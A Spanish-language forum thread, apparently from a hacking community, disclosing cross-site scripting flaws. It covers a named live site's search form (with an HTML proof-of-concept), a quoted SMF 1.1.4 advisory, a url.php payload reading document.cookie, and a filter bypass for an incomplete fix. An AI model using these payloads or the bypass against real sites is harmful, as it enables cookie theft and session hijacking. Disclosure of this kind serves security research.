XSS en PortalHacker.net

WHK · 2 Noviembre 2007, 00:54 AM

Hace tiempo encontré algunos XSS en elhacker.com y .org pero aún no los reparan a pesar del tiempo que llevan y de que fueron publicados y avisados. Ahora portalhacker.net también tiene un XSS localizado en el buscador de la pagina principal.

PoC:

Código (html4strict) [Seleccionar]

<form name="buscarform" action="http://www.portalhacker.net/buscar.php" method="post">
<input name="buscar" type="hidden" value="ok">
<input name="query" type="text" size=12 value="Pon tu XSS acá">
<input type="submit" value="Enviar"></form>

Donde puse "Pon tu XSS acá" prueba con enviar la siguiente petición post: "<script>alert(/xss/);</script>"

Después se quejan del porqué les roban las cookies.

Freeze. · 2 Noviembre 2007, 01:04 AM

Si no me equivoco (Y creo que no) es un Bug en los Smf 1.1.4

WHK · 2 Noviembre 2007, 01:05 AM

NO..... ese buscador no es propio del foro, el XSS de SMF es otro mas

al final tienen como 4 XSS incluyendo web y foro pero la diferencia es que los que tu dices son solo locales y tendrías que tener derechos sobre el foro para crear los XSS, este que yo digo cualquiera puede crearlo.

Freeze. · 2 Noviembre 2007, 01:07 AM

Umm ok..!

Ahora si te doy la razon. xD xD xD
"Despues se quejan"

Por cierto no sabes de donde bajo el parche para el XSS q presenta el 1.1.4...!!

WHK · 2 Noviembre 2007, 01:10 AM

CitarPor cierto no sabes de donde bajo el parche para el XSS q presenta el 1.1.4...!!

No hay aún pero no te preocupes ya que no son remotos a menos que se incluya un CSRF aunque dudo mucho que SMF sea vulnerable a eso.

Supongo que te refieres a este:

Citar_____________________________________________________________________
_______
| |
| __________.__ __ __________ __ |
| \______ \ | _____ ____ | | _\______ \ ____ _____/ |_ ______ |
| | | _/ | \__ \ _/ ___\| |/ /| _// _ \ / _ \ __\/ ___/ |
| | | \ |__/ __ \\ \___| < | | ( <_> | <_> ) | \___ \ |
| |______ /____(____ /\___ >__|_ \|____|_ /\____/ \____/|__| /____ > |
| \/ \/ \/ \/ \/ \/ |
|----------------------------------------------------------------------------|
| |
| http://www.blackroots.it staff[at]blackroots[
dot]it |
| |
| Autore : The-Dark_Man && Bled |
|____________________________________________________________________________|

##############################################################################
# #
# XSS smf 1.1.4 #
# #
##############################################################################

Found Xss in the administration...

1----------------------
Go to http://link/[path]/index.php?action=news
Modify the news and insert
<script>alert('Xss')</script>
Save the news! no an alert will be generated in every page!

2---------------------
Go to http://link/[path]/index.php?action=manageboards
Create a new forum with Title:
<script>alert('Xss')</script>
result? XSS

3---------------------
Go here http://link/[path]/index.php?action=membergroups;
Modify or create a new gruop and name it:
<script>alert('Xss')</script>

----------------------
The-Dark_Man && Bled of blackroots.it

WHK · 13 Enero 2008, 03:24 AM

Nuevamente portalhacker tiene un nuevo xss:
http://foro.portalhacker.net/url.php?urlc=javascript:alert(document.cookie);

Parece que ese foro se ha descuidado muchisimo, ojala que no le pase lo mismo que a otro que le robaron el dominio por un xss.

Deja mucho de que hablar en cuanto a la calidad del servidor y del estado de la misma página.

¿Será mala administración?

Freeze. · 13 Enero 2008, 03:32 AM

Es increible que un foro de 'hacking' descuide tanto su web/foro

NadiceJMA · 13 Enero 2008, 04:02 AM

parece que ya repararon el bug....

Thor · 13 Enero 2008, 04:14 AM

No lo han reparado del todo, la página busca la palabra "javascript" pero... solo en minúsculas, esto sigue funcionando:
http://foro.portalhacker.net/url.php?urlc=javascript:alert(document.cookie);

sirdarckcat · 13 Enero 2008, 17:24 PM

WHK.. la fuente.. ¬¬